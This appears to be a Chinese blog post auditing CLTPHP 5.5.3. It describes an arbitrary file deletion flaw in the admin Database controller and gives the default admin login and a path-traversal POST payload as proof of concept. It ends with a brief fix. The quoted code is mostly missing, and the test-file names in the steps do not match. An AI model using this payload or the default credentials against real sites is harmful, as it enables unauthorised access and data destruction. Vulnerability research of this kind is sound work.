标签:后台 sql code center UNC pos 修复 png res
CLTPHP官网:http://www.cltphp.com
网站源码版本:CLTPHP内容管理系统5.5.3版本
程序源码下载:https://gitee.com/chichu/cltphp
默认后台地址: http://127.0.0.1/admin/login/index.html
默认账号密码: 后台登录名:admin 密码:admin123
测试网站首页:
1、/app/admin/controller/Database.php 第221-248行:
28. }
在这段函数中,参数sqlfilename未经任何处理,直接带入unlink函数中删除,导致程序在实现上存在任意文件删除漏洞,攻击者可通过该漏洞删除任意文件。
1、 在根目录新建test.txt,作为漏洞测试文件
2、 构造URL,成功删除根目录的1.txt文件
http://127.0.0.1/admin/Database/delSqlFiles.html
POST: sqlfilename=..\\..\\1.txt
1、对于要删除的文件,通过正则判断用户输入的参数的格式,看输入的格式是否合法。
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
【代码审计】CLTPHP_v5.5.3后台任意文件删除漏洞分析
标签:后台 sql code center UNC pos 修复 png res
原文地址:https://www.cnblogs.com/xiaozi/p/10053126.html